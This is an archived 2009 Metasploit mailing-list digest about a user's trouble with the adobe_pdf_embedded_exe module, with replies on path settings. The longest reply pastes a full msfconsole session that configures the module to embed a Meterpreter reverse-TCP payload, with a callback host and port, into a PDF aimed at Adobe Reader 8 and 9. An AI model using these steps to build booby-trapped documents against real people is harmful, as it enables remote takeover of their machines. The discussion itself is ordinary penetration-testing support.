Metasploit mailing list archives

Framework Digest, Vol 20, Issue 25


From: mr.r.birtles at gmail.com (ricky-lee birtles)
Date: Sun, 27 Sep 2009 11:04:04 +0100

moshe,

Have a look through the following generation of a PDF with the exploit
you are looking at and see if there is anything you have missed.
Hopefully this will help.

usr at endure /msf3
$ ./msfconsole
*** Metasploit only has EXPERIMENTAL support for Ruby 1.9.1 and newer, things may break!
*** Please report bugs to msfdev[at]metasploit.com

                |                    |      _) |
 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __|
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
                              _|


       =[ msf v3.3-dev [core:3.3 api:1.0]
+ -- --=[ 405 exploits - 260 payloads
+ -- --=[ 21 encoders - 8 nops
       =[ 189 aux

msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) > show options

Module options:

   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   EXENAME                       no        The Name of payload exe.
   FILENAME    evil.pdf          no        The output filename.
   INFILENAME  msf.pdf           no        The Input PDF filename.
   OUTPUTPATH  ./data/exploits/  no        The location to output the file.


Exploit target:

   Id  Name
   --  ----
   0   Adobe Reader v8.x, v9.x (Windows XP SP3 English)


msf exploit(adobe_pdf_embedded_exe) > set EXENAME out.exe
EXENAME => out.exe
msf exploit(adobe_pdf_embedded_exe) > set INFILENAME /tmp/373.pdf
INFILENAME => /tmp/373.pdf
msf exploit(adobe_pdf_embedded_exe) > set OUTPUTPATH /tmp/
OUTPUTPATH => /tmp/
msf exploit(adobe_pdf_embedded_exe) > set FILENAME msf_file.pdf
FILENAME => msf_file.pdf
msf exploit(adobe_pdf_embedded_exe) > set PAYLOAD windows/meterpreter/reverse_ord_tcp
PAYLOAD => windows/meterpreter/reverse_ord_tcp
msf exploit(adobe_pdf_embedded_exe) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   EXENAME     out.exe          no        The Name of payload exe.
   FILENAME    msf_file.pdf     no        The output filename.
   INFILENAME  /tmp/373.pdf     no        The Input PDF filename.
   OUTPUTPATH  /tmp/            no        The location to output the file.


Payload options (windows/meterpreter/reverse_ord_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST                      yes       The local address
   LPORT     4444             yes       The local port


Exploit target:

   Id  Name
   --  ----
   0   Adobe Reader v8.x, v9.x (Windows XP SP3 English)


msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.10.101
LHOST => 192.168.10.101
msf exploit(adobe_pdf_embedded_exe) > exploit

[*] Started reverse handler
[*] Reading in '/tmp/373.pdf'...
[*] Parseing '/tmp/373.pdf'...
[*] Parseing Successfull.
[*] Using 'out.exe' as payload...
[*] Creating 'msf_file.pdf' file...
[*] Generated output file /tmp/msf_file.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_pdf_embedded_exe) >



-- Mr R Birtles



2009/9/27 Moshe Ben Simon <moshe at injection.co.il>:
Hi HD

I look over the "adobe_pdf_embedded_exe" Ruby script and find the variables
INFILENAME, EXENAME, FILENAME, OUTPUTPATH but when I try to use them I get
again the error...

Can somebody help me on the syntax....

Help....:)


Moshe

-----Original Message-----
From: framework-bounces at spool.metasploit.com
[mailto:framework-bounces at spool.metasploit.com] On Behalf Of
framework-request at spool.metasploit.com
Sent: Saturday, September 26, 2009 9:00 PM
To: framework at spool.metasploit.com
Subject: Framework Digest, Vol 20, Issue 25


Today's Topics:

   1. adobe_pdf_embedded_exe (Moshe Ben Simon)
   2. adobe_pdf_embedded_exe (Moshe Ben Simon)
   3. Re: adobe_pdf_embedded_exe (Jerome Athias)
   4. Re: adobe_pdf_embedded_exe (HD Moore)


----------------------------------------------------------------------

Message: 1
Date: Sat, 26 Sep 2009 16:01:17 +0300 (IDT)
From: "Moshe Ben Simon" <moshe at injection.co.il>
To: framework at spool.metasploit.com
Subject: [framework] adobe_pdf_embedded_exe
Message-ID: <77fe340193a0c1c3972792e3adb68e33.squirrel at mail.injection.co.il>
Content-Type: text/plain;charset=iso-8859-1

I read the article on pdf with meterpreter and test your
"adobe_pdf_embedded_exe".

I get all the time the same error:

"Exploit failed: No such file or directory - msf.pdf"

Do you know why??

I have pdf file called msf.pdf in the directory /data/exploit under
framework3





------------------------------

Message: 2
Date: Sat, 26 Sep 2009 15:42:29 +0200
From: "Moshe Ben Simon" <moshe at injection.co.il>
To: <framework at spool.metasploit.com>
Subject: [framework] adobe_pdf_embedded_exe
Message-ID: <20090926131230.4BC20307D6 at slug.metasploit.com>
Content-Type: text/plain; charset="us-ascii"

I read the article on pdf with meterpreter and test your
"adobe_pdf_embedded_exe".

I get all the time the same error:

"Exploit failed: No such file or directory - msf.pdf"

Do you know why?

I have pdf file called msf.pdf in the directory /data/exploit under
framework3

------------------------------

Message: 3
Date: Sat, 26 Sep 2009 16:21:37 +0200
From: Jerome Athias <jerome.athias at free.fr>
To: moshe at injection.co.il
Cc: framework at spool.metasploit.com
Subject: Re: [framework] adobe_pdf_embedded_exe
Message-ID: <1253974897.4336.3.camel at acer>
Content-Type: text/plain

Heya,

you should learn more about this here:
http://www.stoned-vienna.com

Good luck
/JA



------------------------------

Message: 4
Date: Sat, 26 Sep 2009 09:34:33 -0500
From: HD Moore <hdm at metasploit.com>
To: framework at spool.metasploit.com
Subject: Re: [framework] adobe_pdf_embedded_exe
Message-ID: <1253975673.4181.43.camel at localhost>
Content-Type: text/plain; charset="UTF-8"

On Sat, 2009-09-26 at 15:42 +0200, Moshe Ben Simon wrote:
> I read the article on pdf with meterpreter and test your
> "adobe_pdf_embedded_exe".
>
> I get all the time the same error:
>
> "Exploit failed: No such file or directory - msf.pdf"
>
> Do you know why??

You have to specify the full path for the input file, and the output
directory, and output file name for the created PDF

-HD



------------------------------

_______________________________________________
Framework mailing list
Framework at spool.metasploit.com
https://mail.metasploit.com/mailman/listinfo/framework


End of Framework Digest, Vol 20, Issue 25
*****************************************
